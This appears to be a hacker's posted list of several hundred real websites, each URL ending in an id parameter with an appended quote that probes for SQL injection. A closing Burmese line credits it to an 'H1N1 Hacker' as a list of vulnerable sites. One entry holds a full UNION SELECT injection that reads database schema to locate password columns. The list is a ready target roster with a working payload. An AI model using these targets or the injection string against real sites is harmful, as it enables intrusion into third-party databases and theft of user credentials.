http://www.valiani.com/computerised_detail.php?ID=1' http://www.craftaustralia.org.au/library/review.php?id=ghost_nets' http://www.jocuri-online.net/game.php?id=5' http://www.4wdsystems.com.au/index.php?id=29' http://www.ath-elite.com.au/trainers.php?id=25' http://www.amrproductions.nl/faq/view_faq.php?id=8' http://www.actipack.fr/actipack/lang_EN/fiche_produit.php?id=29' http://campus.sanook.com/inlove/read.php?id=86' http://www.ics.heacademy.ac.uk/publications/book_reviews/full_review.php?id=421' http://www.ianforsythphotographer.com/main.php?id=1' http://www.saumon-fqsa.qc.ca/en/section.php?ID=16' http://www.dkggroup.com/newsdetail.php?id=165' http://www.kagakribet.com/humor.php?id=147' http://www.datraveler.com/main/theme.php?id=214' http://www.constructionspares.com/main.php?ID=6' http://www.punp.edu.ph/main.php?id=33' http://slantmagazine.com/giveaway_detail.php?id=2' http://shohomes.com/gallery.php?id=10' http://senl.com/nav/artikel_info.php?id=1388' http://senl.com/nav/artikel_info.php?id=574' http://www.cross.tv/52790?channel_id=1104'
http://www.newlife.co.uk/show.php?id=592' http://www.thecompletepianist.com/material.php?id=7' https://www.camillushouse.org/news_center/news_detail.php?ID=78' http://www.liquidafrica.com/newsdetail.php?id=1246' http://dvdholocaust.com/review.php?id=68' http://dvdmaniacs.net/review.php?id=974' http://www.msmedicalsystems.com.br/ecommerce/product_info.php?id_produto=221' http://www.allnations.net/equipment/prodinfo.php?ID=235' http://www.neilprydemaui.com/category.php?id=6' http://www.atitelemetry.com/viewapp.php?id=7' http://www.dynamicptmichigan.com/news.php?id=22' http://www.pcofiowa.com/news.php?id=15' http://www.benlongfineart.com/news.php?id=13' http://stadiumsportsllc.com/news_view.php?id=20' http://www.kcl.ac.uk/teares/nmvc/external/contact/staff_page.php?staff_id=747' http://www.ristorantelarsenale.com/newscat.php?id_newscategory=3' http://www.galleri-a.no/main.php?id=utstilling&utstillingid=1231337157' http://www.kcl.ac.uk/teares/nmvc/external/contact/staff_page.php?staff_id=67' http://www.futuresfins.com/fin-detail.php?id=69' http://core.materials.ac.uk/search/detail.php?id=1803' http://wordtheatre.com/events/event.php?id=140'
http://www.pimp-codes.com/preview.php?id=1544' http://www.shirtsenletters.nl/nav/artikel_info.php?id=1377' http://www.guitars4you.co.uk/product-detail.php?id=413' http://www.bsp.org.uk/news_full.php?id=55' http://www.internationalstudents.org/culture-humor.php?idlv2=39' http://www.2hgs.com/detail_humor.php?ID=38' http://www.2hgs.com/detail_humor.php?ID=27' http://www.namcap.net/view_product.php?id=31' http://www.plagij.at/tran.php?id=1071' http://www.salon52.ca/academies/curriculum.php?id=174' http://www.skbcases.com/music/news/news-detail.php?id=156' http://dailyexhibit.com/theme.php?id=1224' http://www.avmaniacs.com/review.php?id=1472' http://www.sanpantaleo.sardegna.it/shopping.php?ID_STRUTTURA=16' http://enpi-info.eu/main.php?id=403&id_type=2' http://mayfairgames.com/game.php?id=212' http://thehimalayantimes.com/tgifnfw11/theme.php?id=231' http://www.hplus.sk/title.php?id=27' http://tattoosbybryan.com/showimg.php?id=52' http://www.runningmyraces.com/event.php?id=1870' http://www.pialombardia4.it/newscat.php?id_newscategory=3'
http://www.inkprints.com/php/productlist/productitem.php?id=1459' http://www.wcac.org/show.php?id=1' http://www.djinsure.com/faq/viewFAQ.php?id=8' http://www.hypetrading.com/productinfo.php?id=285' http://greyhenpress.com/news.php?id=4' http://www.gielighting.com/ang/_produit.php?id_cat=3' http://www.intech-tunisia.com/ang/produit.php?id_cat1=3&id_cat=1' http://www.intech-tunisia.com/ang/produit.php?id_cat1=2&id_cat=1' http://www.ceripp.it/curriculum.php?id=9' http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=226' http://www.medpharma-ae.com/showimg.php?id=160' http://www.clickautographs.com/detail.php?id=972' http://www.buzzylinhart.com/news-view.php?id=18' http://games.zbeng.net/game.php?id=13' http://www.ma-maas.nl/prodDetail.php?id_prd=63' http://www.mygoodact.com/collectiondetailperson.php?id=54' http://www.sigmaspa.com/web/prod_detail.php?ID=225' http://www.broderna-anderssons.se/prod_detail.php?id=109' http://queensfashion-paris.fr/ang/produit.php?id=23' http://cornthwaites.co.uk/viewproduct.php?id=439&catid=6' http://www.seanscottphotography.com.au/shop_category.php?id=2'
http://www.webcommerce.insee.fr/fiche-produit.php?id_produit=2327' http://www.macmahonphoto.fr/produit.php?id=232&table=H%E9liopan' http://www.edseven.com/item_look.php?id=13' http://www.busaccagallery.com/item_info.php?id=2756' http://www.areyoureadytoorder.co.uk/review.php?id=251' http://www.y2neil.com/reviews/review.php?id=17' http://www.dellorto.fr/details-produit.php?id_produit=2042' http://weddingdressmarket.com/info.php?id=7413' http://www.biclopsgames.com/game.php?id=1' http://byeu.org/photos/viewphoto.php?ID=189' http://www.lifedesigns.org/viewproduct.php?id=92' http://www.bernard-vidal.com/view-photo.php?id=81' http://www.medpharma-ae.com/showpost.php?id=68' http://www.svasweb.org/news.php?id=59' http://old.brownsvilleherald.com/opinions.php?id=0' http://www.cupid.biz/support/opinions.php?id=61' http://www.armorysq.org/main/shopping.php?id=157' http://www.babycareadvice.com/babycare/general_help/article.php?id=48' http://ux.brookdalecc.edu/fac/tlc/fac/tlc_blog_post.php?id=11' http://www.mamalibro.com/pagines/llibre_opinions.php?id=9788434237872' http://www.caiguoqiang.com/project_detail.php?id=196'
http://www.cometantenna.com/newPro_detail.php?ID=234' http://perkins.pvt.k12.ma.us/museum/section.php?id=214' http://wwww.newlife.co.uk/show.php?id=107' http://www.totemcreation.fr/produits/theme.php?idtheme=797&idrub=100' http://www.tourisme-boulognesurmer.com/shopping.php?id=36' http://www.chinafashiontang.com/productinfo.php?id=627' http://mayfairgames.com/game.php?id=341' http://www.emaxxtech.com/view_faq.php?id=44' http://alliemsalon.com/news_full.php?id=16' http://www.dracoders.com/games.php?id=14' http://www.digitaldickens.com/section.php?id=6' http://www.equality-ne.co.uk/readnews.php?id=3728' http://www.cupid.biz/support/opinions.php?id=46' http://www.traikos.us/trends_opinions.php?id=5' http://www.cometantenna.com/newPro_detail.php?ID=264' http://www.bulletproofautomotive.com/catalog-detail.php?ID=7265' http://www.ec21th.com/productinfo.php?id=194' http://www.shoppingtang.com/productinfo.php?id=103' http://www.hbztrade.com/productinfo.php?id=273' http://www.macmahonphoto.fr/produit.php?id=196&table=H%C3%A9liopan' http://www.spraywaysingapore.com/proddetail.php?ID=17'
http://drugandalcoholeducationservices.co.uk/news_detail.php?id=1' http://propartsllc.com/prodDetail.php?ID=596' http://www.melbournefineart.com.au/gallery.php?id=18' http://www.spraywaysingapore.com/proddetail.php?ID=13' http://www.robotech.com/community/forum/messages.php?id=23' http://www.llangollen-railway.co.uk/event.php?id=80' http://www.shop-gun.fr/product.php?id_product=510' http://www.hebron.com/english/gallery.php?id=190' http://courtnews.co.nz/story.php?id=1660' http://www.backbiomass.co.uk/newsroom-story.php?id=19' http://www.bulletproofautomotive.com/catalog-detail.php?ID=7057' http://www.srilankatravelcentre.com/pages.php?id=47' http://ethansreview.com/website.php?id=1' http://www.svasweb.org/news.php?id=77' http://www.austells.net/news/news_full.php?id=35' http://www.vertexlaw.co.uk/news/detail.php?id=000171' http://www.ebambi.com/profile_view.php?id=100000008' http://www.cabinetglass.com/preview.php?id=352' http://www.henleystandard.co.uk/news/news.php?id=799582' http://www.masshist.org/database/doc-viewer.php?item_id=99' http://www.evene.fr/forum/theme.php?id_theme=13'
http://www.shop-gun.fr/category.php?id_category=13' http://www.drummajorinstitute.org/events/unique_event.php?ID=49' http://www.walkamilepeterborough.com/participant.php?id=94' http://www.yboaofnc.com/event.php?id=8' http://www.prespec-consulting.com/theme/theme.php?id_theme=7' http://www.eia.org.uk/view.php?id=948' http://www.rockthewok.com/readnews.php?id=24' http://www.sghgate.net/productinfo.php?id=627' http://mikesmit.com/show_post.php?id=1175207880' http://www.djinsure.com/faq/viewFAQ.php?id=13' http://www.fspacerpg.com/proddetail.php?ID=FSPEB103' http://www.narkissosshavingoil.com/product/item.php?ID=1' http://www.oiwsba.com/oiwsba/memberinfo.php?id=54' http://www.bayareaassn.com/memberinfo.php?id=7' http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=101' http://staff-driver.net/page.php?file=vacansys&vacstart=10' http://www.bengaldens.com/detail_all_post.php?id=78' http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=321' http://www.suagacollection.com/photo-gallery.php?id=1' http://www.srilankatravelcentre.com/pages.php?id=49' http://www.sedicifilm.it/games.php?id_cat3=55'
http://www.motorxchange.fr/destockages.php?id_destockage=123' http://www.gocontempo.com/pages.php?id=2' http://inrecs.com/releases.php?id=1' http://www.nsche.org.ng/communiquedetail.php?ID=2' http://www.aquasignal.info/us/cms/htdocs/main.php?id=209' http://www.discoverypartnerships.com/register/curriculum.php?id=44' http://www.ghnats.org/pages.php?id=2' http://www.worldmusicinstitute.org/event.php?id=906' http://wminyc.org/event.php?id=1072' http://www.arcana.com/view_title.php?id=189' http://spokesrecords.com/releases.php?id=2' http://www.canalchat.com/transcript.php?id_alaffiche=1013' http://www.canalchat.com/transcript.php?id_alaffiche=783' http://cloneemotorcentre.ie/faq2.php?id=15' http://komagan.net/readnews.php?id=5' http://fpchurch.org.uk/News/view.php?id=26' http://sflcn.com/story.php?id=9826' http://www.oldtimephotos.org/gallery.php?id=11' http://www.latintourdimensions.com/overview/product_detail.php?id=352' http://www.latintourdimensions.com/overview/product_detail.php?id=86' http://www.seanscottphotography.com.au/shop_category.php?id=1'
http://mappn.com/game.php?id=3' http://www.geneticsandsociety.org/article.php?id=129' http://www.uslandandhome.com/detail.php?id=2649' http://www.ndc.ps/main.php?id=9' http://www.falltvpreview.com/show.php?id=1037' http://www.timeref.com/myperson.php?id=1752' http://www.trumanlibrary.org/photographs/view.php?id=392' http://perkins.pvt.k12.ma.us/museum/section.php?id=213' http://ohr.edu/ask_db/ask_main.php?id_number=222' http://www.torinofilmlab.it/person.php?id=344' http://www.torinofilmlab.it/person.php?id=338' http://ce.et.tudelft.nl/person.php?id=926' http://www.natalpress.com.br/humor.php?id=7775' http://www.driftsurfing.eu/surf_article.php?id=1880' http://www.emaxxtech.com/view_faq.php?id=34' http://www.hotproperties-bayarea.com/readnews.php?id=11' http://www.stonemarket.co.uk/section.php?id=3' http://www.micronanosystems.co.uk/nano_news_full.php?id=72544' http://www.brock.ac.uk/news/news/detail.php?id=000178' http://www.brock.ac.uk/news/news/detail.php?id=000189' http://www.thedockyard.co.uk/photo_gallery_pop.php?id=43'
http://www.inner-live.com/index.php?task=channels&action=view&channel_id=339' http://www.drinksontario.com/memberinfo.php?id=70' http://www.hebron.com/english/gallery.php?id=170' http://www.evene.fr/forum/theme.php?id_theme=19' http://hoohila.stanford.edu/firingline/displayTranscript.php?programID=418' http://www.irishart.com/dispgallery.php?id=518' http://linkinthebox.com/productinfo.php?id=109' http://www.wall4me.com/uk/page_produit.php?id=16' http://www.carhs.de/en/company/news/full.php?Id=202' http://www.austells.net/news/news_full.php?id=30' http://www.humormillnews.com/hmill/read.php?id=13' http://lemhiweb.com/news.php?id=36' http://www.shirtsenletters.nl/nav/artikel_info.php?id=631' http://www.boys.njpanthers.com/preview.php?id=24' http://www.fasl.ch/activites/tous_annonces_ages.php?idcentre' http://en.swfplay.net/game.php?id=104' http://www.gp.org/speakers/detail.php?ID=29' http://www.polkatheatre.com/event.php?id=43' http://brml.technion.ac.il/publications.php?id=7' http://www.gordonsmithguitars.co.uk/products/category.php?id=2' http://www.18eighty.com/os_view_product.php?id=37'
http://www.octaviahousing.org.uk/about-us/news/view.php?Id=233' http://www.tecnologi.net/wp/curriculum.php?id=237' http://www.worldstyling.com/web/product_detail.php?id=95' http://cherokeeguitar.com/product-detail.php?id=16' http://www.westcliffepublishers.com/detail.php?id=345' http://www.justcampagne.fr/en/produit.php?id_cat=5' http://www.glac.fr/en/produit.php?id=76' http://www.theshootinggamepage.com/displaygames.php?id=32' http://www.skbcases.com/music/news/news-detail.php?id=82' http://bryanco.com/news_post.php?id=26' http://weekend.od.ua/news_full.php?id=1531' http://www.kusuri.co.uk/view_product.php?id=245' http://www.kusuri.co.uk/view_product.php?id=242' http://www.charot.com/produit.php?id=20' http://www.nicolasmarquis.com/site/produit.php?id=%2733' http://www.indianewsheadlines.com/post.php?id=8006' http://www.dentistry.co.uk/news/news_detail.php?id=2292' http://www.dentistry.co.uk/news/news_detail.php?id=1330' http://www.manka-creations.com/AG/produit.php?ID_produits=4' http://www.carldavey.co.uk/product.php?id=2' http://www.actipack.fr/actipack/lang_EN/fiche_produit.php?id=180'
http://www.walkamilepeterborough.com/participant.php?id=95' http://www.gielighting.com/ang/_produit.php?id_cat=7' http://www.manka-creations.com/AG/produit.php?ID_produits=28' http://www.clicfolio.com/clicfolio/curriculum.php?id=5079' http://www.wardrobesystems.co.uk/preview.php?id=365' http://www.planetbollywood.com/displayArticle.php?id=s011911120004' http://www.peabody.uga.edu/news/event.php?id=59' http://snakedancecondos.com/pages.php?id=10' http://www.zoolyshop.com/productinfo.php?id=201' http://mx5.brighton-rock.net/BandInfo.php?ID=315' http://mx5.brighton-rock.net/BandInfo.php?ID=643' http://www.skbcases.com/industrial/products/prod-detail.php?id=235' http://elmercadohispano.com/prod_detail.php?ID=284" onclick="sa_mpTC(event, this); return false;' http://bulacandeped.org/viewannounce.php?id=4' http://www.retroinferno.com/viewproduct.php?id=235' http://core.materials.ac.uk/search/detail.php?id=1300' http://www.clickautographs.com/detail.php?id=1611' http://brml.technion.ac.il/publications.php?id=6' http://dufieux-industrie.com/en/fiche_type_produit.php?id=15' http://www.lindbergbros.com/page/post.php?id=365'
http://www.mvsport-tuning.com/viewProduct.php?id=23' http://bryanco.com/news_post.php?id=23' http://www.kevinmurphy.com.au/products/styling_productdetail.php?id=17' http://www.pioneer-group.co.uk/event.php?id=17' http://ohr.edu/ask_db/ask_main.php?id_number=1310' http://www.amoryssolicitors.com/main.php?ID=1' http://boxofficebuz.com/news_full.php?id=36' http://leavenworth.org/modules/pages/index.php?pageid=1' http://www.armorysquareofsyracuse.com/main/shopping.php?id=14' http://www.greenkettle.co.uk/view.php?id=%277' http://www.discoverypartnerships.com/register/curriculum.php?id=49' http://www.feicuidao.com/jqzx_look.php?id=26' http://www.merseyfencing.co.uk/section.php?id=Timber-Fence-Panels' http://www.tanthrough.com/proddetail.php?id=809790' http://www.inhealthnw.com/story.php?id=143' http://www.saleemcarpets.com/prod_detail.php?ID=10' http://kornerstore.net/ks_proddetail.php?ID=180' http://www.widescreenreview.com/news_detail.php?id=19267' http://dpanswers.com/roztr/content_show.php?id=86' http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=71' http://www.hypetrading.com/productinfo.php?id=491'
http://www.mikesmit.com/show_post.php?id=1141826580' http://www.charot.com/produit.php?id=13' http://www.coedllandegla.com/download.php?id=2' http://www.cfnielsen.com/material.php?id=17' http://ce.et.tudelft.nl/publications.php?id=1755' http://www.mediflight.com.au/publications.php?id=75' http://english.euyou.com/shopping.php?id=25&countryid=7' http://rainydaymv.com/toys/games-toys-all-ages.php?id=35' http://www.uni-saarland.de/fak3/fr36/sites/institut/person.php?id=1' http://www.medix.com.hr/aboutbook.php?id=33' http://www.australianewsonline.com/post.php?id=9960' http://www.dundeetrainingstable.com/news-full.php?ID=16' http://www.actforkids.com.au/news_full.php?id=134' http://www.glac.fr/en/produit.php?id=45' http://www.glac.fr/en/produit.php?id=11' http://www.glac.fr/en/produit.php?id=51' http://www.youngatheartministries.com/prod_detail.php?id=3' http://www.communityinclusion.org/staff.php?staff_id=21' http://www.flyfishinginmaine.com/story.php?id=58' http://cherokeeguitar.com/product-detail.php?id=19' http://www.retroinferno.com/viewproduct.php?id=700'
http://capeyouthadventures.co.za/main.php?Id=6' http://www.sflcn.com/story.php?id=6946' http://www.benlongfineart.com/news.php?id=8' http://www.edwardsymmons.com/pages/news_story.php?id=171' http://www.alte.org/news/newsitem.php?newsID=209' http://www.iol.umd.edu/People/person.php?id=tweyrauch' http://www.cornerstone.org.uk/publications.php?id=newsletters' http://lucklyinthebox.com/productinfo.php?id=1155' http://www.allnations.net/equipment/prodinfo.php?ID=283' http://www.coastalengineering.com/staff_pop.php?id=10' http://www.prespec-consulting.com/theme/theme.php?id_theme=8' http://komagan.net/readnews.php?id=7' http://www.aspasiabooks.com/News_View.php?ID=37' http://www.newmasterplanning.com/project_main.php?id=16' http://www.biblioteca-ua.com/select_biblio.php?id=1599+union+select+1%2Cconcat%28table_name%2C0x3a%2Ccolumn_name%2C0x3a%2Ctab le_sc hema%29%2C3%2C4%2C5+from+information_schema.columns+where+column_name+LIKE +CHAR% 2837%2C+112%2C+97%2C+115%2C+37%29--' http://biblioteca-ua.com/select_biblio.php?id=1599" onclick="sa_mpTC(event, this); return false;' http://www.dentistry.co.uk/news/news_detail.php?id=808' http://www.dentistry.co.uk/news/news_detail.php?id=2380'
http://yoga.ge/pages/theme.php?id=192%E1%83%99%E1%83%90%E1%83%A0%E1%83%9 2%E1%83%98%E1%83%90' http://www.lawetalnews.com/post.php?id=144' http://www.nu.edu.bd/noticeInfo.php?id=355' http://www.glac.fr/en/produit.php?id=66' http://www.glac.fr/en/produit.php?id=82' http://www.anchoryachts.com/preview.php?ID=3' http://www.tecnologi.net/wp/curriculum.php?id=36' https://powertraveller.com/news/detail.php?id=000296' http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=17' http://www.f4customs.com/install_pages.php?id=8' http://www.luimo.org/curriculum.php?id=ST000036' http://rainydaymv.com/toys/games-toys-all-ages.php?id=21' http://www.thefastshow.com/virtual_show_detail.php?ID=44' http://boxofficebuz.com/news_full.php?id=57' http://www.amouage.com/news.php?ID=10' http://www.yboaofnc.com/event.php?id=63' http://www.indianewsheadlines.com/post.php?id=8049' http://www.sinclairgroup.com/sinclair_web/person.php?id=104' http://www.samsungmobilers.ro/post.php?id=143' http://www.johandemeij.com/post.php?id=223'
http://www.chot.org/pages.php?id=88' http://www.walesdirectory.co.uk/events/event.php?id=2377' http://riyadhtravel.net/show.php?id=3' http://iwine.com.hk/product_item.php?id=17' http://www.dvdholocaust.com/review.php?id=473' http://computer.ytu.edu.cn/showannounce.php?id=41' http://www.robotech.com/community/forum/messages.php?id=24' http://www.sinclairgroup.com/sinclair_web/person.php?id=49' http://arthurpober.com/pages.php?id=15' http://www.vertexlaw.co.uk/news/detail.php?id=000056' http://allnations.net/equipment/prodinfo.php?ID=3' http://www.allnations.net/equipment/prodinfo.php?ID=236' http://www.towncityrealty.com/info.php?id=25' http://www.avmaniacs.com/review.php?id=319' http://www.watercampws.uiuc.edu/index.php?menu_item_id=44' http://www.brighton-rock.net/BandInfo.php?ID=479' http://www.brighton-rock.net/BandInfo.php?ID=555' http://www.pokenav.net/blog_post.php?id=1019' http://www.bohemianchandeliers.co.uk/site_files/prod_detail.php?id=19' http://capturegis.com/pages.php?id=10' http://www.saleemcarpets.com/prod_detail.php?ID=57'
http://www.beemabuild.co.uk/view_product.php?id=258' http://www.coastal-koi.com/view_product.php?id=1393' http://mapleislandsales.com/product_detail.php?ID=78' http://www.sigmaspa.com/web/prod_detail.php?ID=216' http://www.familiscope.ie/main.php?ID=3' http://biomed.eng.cmu.ac.th/index.php?newsdetail.php&id=63' http://www.justcampagne.fr/en/produit.php?id_cat=2&id=88&id_coul=12' http://www.checkersindustrial.com/product.php?id=74' http://www.craftaustralia.org.au/library/review.php?id=ghost_nets' http://www.girls.njpanthers.com/preview.php?id=25' http://linkinthebox.com/productinfo.php?id=109' http://www.guruslodge.com/index.php?topic=6484.0' http://www.edseven.com/item_look.php?id=13' http://www.pioneer-group.co.uk/event.php?id=16' http://www.minesandcommunities.org/look.php?id=54' http://www.nmtf.co.uk/index.php?id_cpg=1' http://www.bia2.com/music-review/review.php?id=182' http://www.ics.heacademy.ac.uk/publications/book_reviews/full_review.php?id=421' http://www.rentray.nl/over_rentray.php?id=11' http://www.hotproperties-bayarea.com/readnews.php?id=11' http://www.wellydiecast.com/product_detail.php?id=1070'
http://www.cometantenna.com/newPro_detail.php?ID=264' http://www.wellydiecast.com/product_detail.php?id=7' http://www.bulletproofautomotive.com/catalog-detail.php?ID=7265' http://www.robotech.com/community/forum/messages.php?id=23' http://komagan.net/readnews.php?id=5' http://www.humormillnews.com/hmill/read.php?id=13' http://www.natalpress.com.br/humor.php?id=10627' http://www.yboaofnc.com/event.php?id=8' http://www.highlandvillage.org/event.php?id=7' http://hoohila.stanford.edu/firingline/displayTranscript.php?programID=418' http://familynewsabout.com/aboutBook.php?id=3241' http://www.saumon-fqsa.qc.ca/en/section.php?ID=16' http://www.cupid.biz/support/opinions.php?id=46' http://www.traikos.us/trends_opinions.php?id=5' http://riyadhtravel.net/show.php?id=3' http://old.brownsvilleherald.com/opinions.php?id=1590' http://www.zigzagweeklynews.com/opinions.php?ID=6143' http://www.pcofiowa.com/news.php?id=15' http://www.fn-franchecomte.com/communique_detail.php?id=29' http://www.faithinplace.org/news.php?ID=58' http://www.sedicifilm.it/games.php?id_cat3=55'
http://www.vertexlaw.co.uk/news/detail.php?id=000171' http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=321' http://www.wildarttaxidermy.co.uk/gallery.php?id=16' http://www.highlandvillage.org/event.php?id=72' http://www.inner-live.com/index.php?task=channels&action=view&channel_id=339' http://www.llangollen-railway.co.uk/event.php?id=80' http://www.fundraisingnetwork.org/cat-Games.php?id=39' http://www.midlandairmuseum.co.uk/news.php?id=16' http://core.materials.ac.uk/search/detail.php?id=1300' http://www.octaviahousing.org.uk/about-us/news/view.php?Id=233' http://www.bsp.org.uk/news_full.php?id=55' http://www.clickautographs.com/detail.php?id=1611' http://flatbearconsulting.com/pages.php?id_pag=6' http://www.cross.tv/52818?channel_id=1104' http://www.dmgems.co.uk/pages.php?id_sec=2' http://capturegis.com/pages.php?id=10' http://www.minesandcommunities.org/look.php?id=101' http://www.clickautographs.com/detail.php?id=972' http://www.dentistry.co.uk/news/news_detail.php?id=808' http://www.familiscope.ie/main.php?ID=3' http://www.constructionspares.com/main.php?ID=6'
http://www.theshootinggamepage.com/displaygames.php?id=32' http://www.punp.edu.ph/main.php?id=33' http://www.notebookfocus.com/readnews.php?id=343' http://www.westcliffepublishers.com/detail.php?id=345' http://www.seanscottphotography.com.au/shop_category.php?id=2' http://cherokeeguitar.com/product-detail.php?id=19' http://www.bombasticlife.com/place/review.php?id=504' http://www.sedicifilm.it/games.php?id_cat3=61' http://www.thecompletepianist.com/material.php?id=7' http://www.digitaldickens.com/section.php?id=6' http://www.ec21th.com/productinfo.php?id=194' http://www.shoppingtang.com/productinfo.php?id=103' http://www.hbztrade.com/productinfo.php?id=273' http://www.kingslynnarts.co.uk/whatson_event.php?id=46' http://www.sheridan-uk.com/news_detail.php?id=52' http://mappn.com/game.php?id=11' https://powertraveller.com/news/detail.php?id=000126' http://lemhiweb.com/news.php?id=36' http://www.communityinclusion.org/staff.php?staff_id=21' http://games.zbeng.net/game.php?id=13' http://www.drummajorinstitute.org/events/unique_event.php?ID=38'
http://www.falltvpreview.com/show.php?id=1037' http://dvdholocaust.com/review.php?id=68' http://dvdmaniacs.net/review.php?id=974' http://www.mvsport-tuning.com/viewProduct.php?id=23' http://www.allnations.net/equipment/prodinfo.php?ID=283' http://www.amoryssolicitors.com/main.php?ID=1' http://www.twitney.co.uk/theme.php?id=5' http://ethansreview.com/website.php?id=1' http://www.henleystandard.co.uk/news/news.php?id=36113' http://www.drinksontario.com/memberinfo.php?id=70' http://www.svasweb.org/news.php?id=77' http://www.henleystandard.co.uk/news/news.php?id=799582' http://www.thejewishmuseum.org/site/pages/event.php?id=348' http://www.ngo-monitor.org/article.php?id=1564' http://wminyc.org/event.php?id=1072' http://www.abalar.es/ampliar_material.php?id_material=11' http://stadiumsportsllc.com/news_view.php?id=20' http://www.geneticsandsociety.org/article.php?id=282' http://www.worldmusicinstitute.org/event.php?id=906' http://ohr.edu/ask_db/ask_main.php?id_number=222' http://www.shirtsenletters.nl/nav/artikel_info.php?id=631'
http://baywoodbest.com/listingPop.php?Id=620' http://www.shirtsenletters.nl/nav/artikel_info.php?id=1377' http://www.seanscottphotography.com.au/shop_category.php?id=1' http://www.edseven.com/item_look.php?id=4' http://www.peabody.uga.edu/news/event.php?id=59' http://www.waukee.org/event.php?id=19' http://bulacandeped.org/viewannounce.php?id=4' http://www.tourisme-boulognesurmer.com/shopping.php?id=36' http://www.feicuidao.com/jqzx_look.php?id=29' http://www.bernard-vidal.com/view-photo.php?id=76' http://www.portalararuna.com.br/2011/humor.php?id=10' http://www.spraywaysingapore.com/proddetail.php?ID=17' http://propartsllc.com/prodDetail.php?ID=596' http://www.spraywaysingapore.com/proddetail.php?ID=13' http://www.bohemianchandeliers.co.uk/site_files/prod_detail.php?id=16' http://www.equality-ne.co.uk/readnews.php?id=3728' http://www.plusline.org/article.php?id=4695' http://www.medpharma-ae.com/showpost.php?id=68' http://www.guitars4you.co.uk/product-detail.php?id=413' http://www.girls.njpanthers.com/preview.php?id=21' http://www.trumanlibrary.org/photographs/view.php?id=392'
http://www.gocontempo.com/pages.php?id=2' http://ohr.edu/ask_db/ask_main.php?id_number=1310' http://www.glac.fr/en/produit.php?id=47' http://www.fanfics.ru/read.php?id=1515' http://www.dvdmaniacs.net/review.php?id=318' http://www.ath-elite.com.au/trainers.php?id=28' http://www.cheap-web-hosting-info.com/hosting_review.php?id=8' http://www.benlongfineart.com/news.php?id=13' http://gp.org/speakers/detail.php?ID=42' http://inrecs.com/releases.php?id=1' http://www.konceive.com.au/riverside/investAnnounce.php?id=43' http://www.armorysquareofsyracuse.com/main/shopping.php?id=179' http://senl.com/nav/artikel_info.php?id=1388' http://www.valiani.com/computerised_detail.php?ID=1' http://dailyexhibit.com/theme.php?id=1224' http://www.atitelemetry.com/viewapp.php?id=7' http://www.oldtimephotos.org/gallery.php?id=11' http://shohomes.com/gallery.php?id=10' http://www.walesdirectory.co.uk/events/event.php?id=2445' http://www.nowgen.org.uk/facilities/events/event.php?id=11' http://thehimalayantimes.com/tgifnfw11/theme.php?id=259'
http://www.cfnielsen.com/material.php?id=17' http://www.justcampagne.fr/en/produit.php?id_cat=5' http://www.glac.fr/en/produit.php?id=76' http://www.planetbollywood.com/displayReview.php?id=m101411095354' http://www.alte.org/news/newsitem.php?newsID=209' http://www.leadacidbatteryinfo.org/newsdetail.php?id=18' http://www.suagacollection.com/photo-gallery.php?id=1' http://www.bonsaitrees.com/gallery.php?id=7' http://senl.com/nav/artikel_info.php?id=574' https://www.camillushouse.org/news_center/news_detail.php?ID=78' http://www.liquidafrica.com/newsdetail.php?id=1246' http://rainydaymv.com/toys/games-toys-all-ages.php?id=35' http://www.robotech.com/community/forum/messages.php?id=24' http://www.planetbollywood.com/displayArticle.php?id=s011911120004' http://www.aquasignal.info/us/cms/htdocs/main.php?id=209' http://www.kudosshowers.co.uk/gallery.php?id=3' http://www.scotclimb.org.uk/gallery.php?id=83' http://mayfairgames.com/game.php?id=212' http://www.gorodokboxing.com/material.php?id=1' http://www.amandala.com.bz/newsadmin/preview.php?id=28' http://www.wildarttaxidermy.co.uk/gallery.php?id=86'
http://www.scotclimb.org.uk/gallery.php?id=3' http://www.bonsaitrees.com/gallery.php?id=4' http://dvdholocaust.com/review.php?id=577' http://ultimatehomedesign.com/news-detail.php?id=312' http://www.beemabuild.co.uk/view_product.php?id=258' http://www.whatwhenwhere.ie/event.php?id=382' http://www.djinsure.com/faq/viewFAQ.php?id=13' http://www.wcac.org/show.php?id=1' http://www.ebambi.com/profile_view.php?id=100000252' http://www.polkatheatre.com/event.php?id=43' http://www.2hgs.com/detail_humor.php?ID=38' http://www.melbournefineart.com.au/gallery.php?id=18' http://www.2hgs.com/detail_humor.php?ID=27' http://www.individualcars.com/inventory/detail.php?ID=685' http://www.uni-saarland.de/fak3/fr36/sites/institut/person.php?id=1' http://www.djinsure.com/faq/viewFAQ.php?id=8' http://www.techvision.co.uk/news.php?id=45' http://www.nihonmono.com/prod_detail.php?id=11000384' http://www.nissi-beach.com/section.php?id=13' http://spokesrecords.com/releases.php?id=12' http://www.hotproperties-bayarea.com/readnews.php?id=2'
http://asptt.com/running-tour/participant.php?id=14785' http://www.kagakribet.com/humor.php?id=147' http://www.ceripp.it/curriculum.php?id=9' http://www.widescreenreview.com/news_detail.php?id=19267' http://lucklyinthebox.com/productinfo.php?id=1155' http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=51' http://www.yboaofnc.com/event.php?id=3' http://www.nsche.org.ng/communiquedetail.php?ID=2' http://www.nsche.org.ng/communiquedetail.php?ID=3' http://www.4wdsystems.com.au/index.php?id=29'
အထကးပါ Vuln ွကးဘးဆိုကးမ္ာ့စာရငး့သညး H1N1 Hacker ဆီမြေဖၚ်ပထာ့်ခငး့်ဖစးပါသညး
